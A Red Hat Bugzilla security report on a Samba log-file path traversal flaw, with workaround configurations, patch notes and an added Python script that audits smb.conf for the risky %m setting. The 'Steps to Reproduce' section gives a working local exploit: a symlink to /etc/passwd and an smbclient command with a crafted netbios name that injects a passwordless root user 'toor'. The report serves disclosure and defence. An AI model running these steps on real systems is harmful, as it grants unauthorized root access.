From Bugzilla Helper:
User-Agent: Mozilla/4.77 [en] (X11; U; Linux 2.2.19-6.2.1 i686)

Description of problem:
RHAT Samba config contains

    log file = /var/log/samba/%m.log

By using unexpected values for netbios names, attackers can create new .log files, or, using symlinks, can append to existing files (/etc/passwd?).

Michal Zalewski, who reported the bug on Bugtraq (and, apparently, to the Samba team), also reports that the default Samba line of

    log file = /var/log/samba/log.%m

may allow attackers to connect with invalid names containing "/" characters, and evade logging.

How reproducible:
Always

Steps to Reproduce:
(from Michal's report)
1. ln -s /etc/passwd /tmp/x.log
2. smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N
   ...where 'NIMUE' stands for local host name (few error messages should be returned).
3. su toor

Actual Results: root shell

Expected Results: user "toor" should not exist

Additional info:
Preferred configuration, until Samba releases a patch, is

    log file = /var/log/samba/%I.log

or

    log file = /var/log/samba/log.%I

which will make Samba log by IP address, avoiding the "../" netbios name attacks.
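The following Python check is an added example, not part of the original report or of Samba's own code: it flags "log file" settings in an smb.conf that embed the client-chosen %m, suggests the %I form recommended above, and shows that the netbios name from the report expands to a path outside /var/log/samba. The smb.conf fragment, the address 192.0.2.10 and all function names are constructed for illustration.

```python
import posixpath
import re

LOG_DIR = "/var/log/samba"  # log directory named in the report
# Constructed smb.conf fragment (not taken from a real system).
SAMPLE_CONF = """\
[global]
   workgroup = EXAMPLE
   log file = /var/log/samba/%m.log
   max log size = 50
"""

def log_file_settings(conf_text):
    """Yield (line_number, value) for every 'log file' parameter."""
    for num, line in enumerate(conf_text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith(("#", ";")):  # smb.conf comment markers
            continue
        # Samba ignores case and whitespace inside parameter names.
        m = re.match(r"log\s*file\s*=\s*(.+)$", stripped, re.IGNORECASE)
        if m:
            yield num, m.group(1).strip()

def expand(template, netbios_name, client_ip):
    """Substitute only the two macros discussed in the report."""
    return template.replace("%m", netbios_name).replace("%I", client_ip)

def stays_in_log_dir(path, log_dir=LOG_DIR):
    """True if the path, once '..' is collapsed, is still below log_dir."""
    resolved = posixpath.normpath(path)
    return resolved.startswith(log_dir.rstrip("/") + "/")

def audit(conf_text):
    """Return (line, value, suggested_value) for settings that embed %m."""
    return [(num, value, value.replace("%m", "%I"))
            for num, value in log_file_settings(conf_text) if "%m" in value]

if __name__ == "__main__":
    for num, value, fix in audit(SAMPLE_CONF):
        print(f"line {num}: {value!r} uses client-supplied %m; suggest {fix!r}")
        for tmpl in (value, fix):
            path = expand(tmpl, "../../../tmp/x", "192.0.2.10")
            print(f"  {tmpl} -> {posixpath.normpath(path)} "
                  f"(inside log dir: {stays_in_log_dir(path)})")
```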
Updated (2.0.10) rpms for all releases, all architectures are currently in testing.
2.2.10 was released yesterday as a security errata for RHL 5.2, 6.2, 7 and 7.1.